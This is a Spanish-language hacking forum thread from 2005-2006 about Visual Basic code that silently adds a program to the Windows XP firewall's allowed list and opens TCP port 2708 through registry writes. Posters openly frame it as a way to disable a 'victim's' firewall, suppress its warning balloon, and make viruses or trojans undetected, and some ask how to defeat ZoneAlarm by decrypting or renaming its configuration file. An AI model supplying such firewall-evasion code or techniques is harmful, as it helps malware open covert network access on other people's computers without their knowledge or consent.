Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: Scratz en 11 Septiembre 2005, 19:27 pm



Título: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Scratz en 11 Septiembre 2005, 19:27 pm
¿Es posible eso? Se me ocurre crear alguna conexión con internet, y si esa conexión no llega a su destino, es por que el firewall bloquea.
He probado abriendo una web en un WebBrowser, comprobar si hay conexión a internet y verificar el tipo de conexión que tenemos. Pero no me sale el mensaje del firewall pidiendome si quiero bloquearlo =S (incluso después de compilar la aplicación).
¿Alguna idea sobre como detectar si el firewall me bloquea? ???
Gracias ;)

PD: Ya he buscado en google... y nada :'(

Salu2


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: NYlOn en 11 Septiembre 2005, 21:01 pm
para que no t blockee el FireWall de Windows tenes que dejar libre el puerto que vas a usar:
Inicio>Panel de Control>FireWall de Windows>Exepciones>Agregar Puerto/Programa
pero segun tengo entendido el firewall de win solo te blockea las conexiones entrantes...

P.D.: No se si es eso lo q preguntabas, no se entendio bien xDDD

salu2

G0nz4


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Scratz en 11 Septiembre 2005, 21:47 pm
O.o Nah, no preguntaba eso. Pregunto como puedo hacer que mi aplicación detecte si el firewall de windows la está bloqueando.
Pero gracias por leerlo ;)


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Scratz en 11 Septiembre 2005, 22:10 pm
Mi problema es que cuando hago que el firewall de la victima se desactive, le sale un globo de información avisandole de que su equipo puede estar en riesgo. ¿Alguien sabe desactivar esos globos mediante el regedit?


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: NYlOn en 12 Septiembre 2005, 22:24 pm
desactiva los globos desde el registro
ya te dije como hacerlo ;)

Un Abraz0


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: chavo_paraguayo en 21 Agosto 2006, 22:26 pm
Tengo el mismo problema del globo
como se elimina ese mensaje del regedit???????


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Zorrohack en 27 Agosto 2006, 05:01 am
Bueno a aqui esta es una forma que yo utilizo para hacer mis Aplicaciones aceptables para el WinXP Firewall, lo primero que hago es que escribo en el Registro (y no a travez de)
Citar
Inicio>Panel de Control>FireWall de Windows>Exepciones>Agregar Puerto/Programa

Basta con escribir esto:
'---------------------EN ESTE PROCEDIMIENTO ME AÑADO A LA LISTA DE PROGRAMAS PERMITIDOS POR EL Windows Firewall _
Y UTILIZO EL PUERTO 2708 PARA HACER ALGUNAS FUNCIONES QUE REQUIEREN INTERNET
RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "Security Data.exe", App.Path & "\" & "Security Data.exe" & ":*:Enabled:Security Data", RegString
RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2708:TCP", "2708:TCP:*:Enabled:Puerto Security Data", RegString



De esta manera el WinXP Firewall no saltara jamas porque lo que esta haciendo el Programa es que se esta añadiendo al Registro del Firewall para que utilize el Puerto 2708, asi que es una exelente idea a la hora de hacer Viruses o Troyanos


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Badlands en 27 Agosto 2006, 08:51 am
Alguien save como hacer algo parecido pero para el zone alarm o algun otro firewall de la misma calaña?


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Zorrohack en 27 Agosto 2006, 14:41 pm
Supongo que el Zone Alarm o cualquiera tendras que escribir en el Registro basta con saber cuales son las entradas correctas.

Chiao
 ;D


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Badlands en 27 Agosto 2006, 23:54 pm
mmm nose si es en el registro por que hace un tiempo busque donde se guardaba la configuracion del zone alarm de los programas que se ejecutaban, era una carpeta que estaba en windows y dentro de esta habia un archivo que no se como se llamaba, que estaba cifrado y no se podia modificar. No se si alguno save algo al respecto de como saltarlo taria weno saberlo. Pero weno eso es lo unico que pude averiguar y no me sirvio de mucho que digamos. No se si alguno puede aportar algo mas...taria weno


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Zorrohack en 28 Agosto 2006, 06:06 am
bueno si es un Archivo encryptado pues se me ocurren dos cosas:

1. descifrar ese archivo
2. Renombrar el Archivo para asi "joder" el Zone Alarm



Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Badlands en 28 Agosto 2006, 08:37 am
renombrarlo lo dudo ya que no se puede modificar...
y desencriptarlo ni idea me voy a poner a investigar...si tenes algun link me seria de mucha ayuda.


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: JanditoOo en 6 Septiembre 2006, 00:02 am
Uso Visual Basic 6.0 y pongo este comando:

Citar
Private Form_Load()

RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "Security Data.exe", App.Path & "\" & "Security Data.exe" & ":*:Enabled:Security Data", RegString

RegSetValues RegLocalMachine, "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2708:TCP", "2708:TCP:*:Enabled:Puerto Security Data", RegString
End Sub

y me selecciona RegLocalMachine con el siguiente error:

Compile error:
Invalid Outside Procedure

que estara mal?


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: cracket13 en 7 Septiembre 2006, 19:50 pm
ami tambn me selecciona  RegLocalMachine  :-\


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: JanditoOo en 7 Septiembre 2006, 22:33 pm
ami tambn me selecciona  RegLocalMachine  :-\

Ya lo arregle es pq necesitas declarar las apis: mira este codigo:

Citar

Private Sub Form_Load()

On Error Resume Next
Set WS = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

WS.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\VitalWerks\DUC\", "Default", "", "RegString"

End Sub


y asi funciona correctamente =)


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: Scratz en 8 Septiembre 2006, 21:32 pm
Wow! Este mensaje lo postee hace una año y por fin hay respuestas. Gracias a todos.


Título: Re: Detectar si el Firewall de Win XP bloquea la aplicación
Publicado por: LixKeÜ en 15 Septiembre 2006, 23:22 pm
Dim fir
Set fir = CreateObject("WScript.Shell") ' asignamos a una variable el objeto

fir.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\", App.Path & "\" & "Security Data.exe", App.Path & "\" & "Security Data.exe" & ":*:Enabled:Security Data", RegString

fir.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\", "2708:TCP", "2708:TCP:*:Enabled:Puerto Security Data", RegString